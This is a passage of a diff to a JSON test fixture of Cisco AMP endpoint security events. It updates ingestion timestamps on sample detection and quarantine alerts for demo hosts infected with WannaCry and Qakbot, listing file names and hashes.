Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6411525251028484104\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\",\"sha1\":\"8cf0ca99a8f5019d8583133b9a9379299c45470c\",\"md5\":\"6894b3834bd541fa85df79e44568acac\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -901,7 +901,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:47.010690300Z", + "ingested": "2021-12-14T14:40:52.874138165Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411525251028484000,\"timestamp\":1610643578,\"timestamp_nanoseconds\":698000000,\"date\":\"2021-01-14T16:59:38+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6411525251028484104\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}", "code": "553648143", "kind": "alert", 
@@ -973,7 +973,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:47.010695900Z", + "ingested": "2021-12-14T14:40:52.874138723Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":888000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419264043361501262\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", "code": "2164260893", "kind": "alert", 
@@ -1049,7 +1049,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:47.010701200Z", + "ingested": "2021-12-14T14:40:52.874139470Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":779000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419229331435814969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", "code": "2164260893", "kind": "alert", 
@@ -1125,7 +1125,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:47.010706800Z", + "ingested": "2021-12-14T14:40:52.874139958Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":716000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419204905956802579\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", "code": "2164260893", "kind": "alert", 
@@ -1201,7 +1201,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:47.010712300Z", + "ingested": "2021-12-14T14:40:52.874140403Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":888000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6419264043361501261\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", "code": "553648155", "kind": "alert", 
@@ -1279,7 +1279,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:47.010717500Z", + "ingested": "2021-12-14T14:40:52.874140847Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":872000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419264043361501262\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", "code": "553648147", "kind": "alert", 
@@ -1363,7 +1363,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:47.010723Z", + "ingested": "2021-12-14T14:40:52.874141324Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":872000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419264043361501261\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"@WanaDecryptor@.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\@WanaDecryptor@.exe\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\",\"sha1\":\"45356a9dd616ed7161a3b9192e2f318d0ab5ad10\",\"md5\":\"7bf2b57f2a205768755c07f238fb32cc\"}}}}", "code": "553648147", "kind": "alert", 
@@ -1443,7 +1443,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:47.010728300Z", + "ingested": "2021-12-14T14:40:52.874143439Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":763000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419229331435814969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", "code": "553648147", "kind": "alert", 
@@ -1523,7 +1523,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:47.010733500Z", + "ingested": "2021-12-14T14:40:52.874143820Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":716000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419204905956802579\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", "code": "553648147", "kind": "alert", 
@@ -1597,7 +1597,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:47.010738700Z", + "ingested": "2021-12-14T14:40:52.874144227Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264039066534000,\"timestamp\":1610643346,\"timestamp_nanoseconds\":718000000,\"date\":\"2021-01-14T16:55:46+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419229322845880359\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225761,\"description\":\"Cannot delete\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "2164260893", "kind": "alert", 
@@ -1673,7 +1673,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:47.010744Z", + "ingested": "2021-12-14T14:40:52.874144640Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264039066534000,\"timestamp\":1610643346,\"timestamp_nanoseconds\":765000000,\"date\":\"2021-01-14T16:55:46+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6419264039066533964\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "553648155", "kind": "alert", 
@@ -1755,7 +1755,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:47.010749300Z", + "ingested": "2021-12-14T14:40:52.874144990Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264039066534000,\"timestamp\":1610643346,\"timestamp_nanoseconds\":749000000,\"date\":\"2021-01-14T16:55:46+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419264039066533964\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3\",\"md5\":\"54a116ff80df6e6031059fc3036464df\"}}}}", "code": "553648147", "kind": "alert", 
@@ -1839,7 +1839,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:47.010753100Z", + "ingested": "2021-12-14T14:40:52.874145502Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264039066534000,\"timestamp\":1610643346,\"timestamp_nanoseconds\":702000000,\"date\":\"2021-01-14T16:55:46+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419229322845880359\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3\",\"md5\":\"54a116ff80df6e6031059fc3036464df\"}}}}", "code": "553648147", "kind": "alert", 
@@ -1913,7 +1913,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:47.010757600Z", + "ingested": "2021-12-14T14:40:52.874146026Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":729000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412622782676336648\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "code": "2164260893", "kind": "alert", 
@@ -1989,7 +1989,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:47.010762700Z", + "ingested": "2021-12-14T14:40:52.874146472Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":729000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412622782676336647\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "code": "2164260893", "kind": "alert", 
@@ -2065,7 +2065,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:47.010767300Z", + "ingested": "2021-12-14T14:40:52.874146834Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":713000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412622782676336646\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "code": "2164260893", "kind": "alert", 
@@ -2147,7 +2147,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:47.010771200Z", + "ingested": "2021-12-14T14:40:52.874147434Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":198000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective 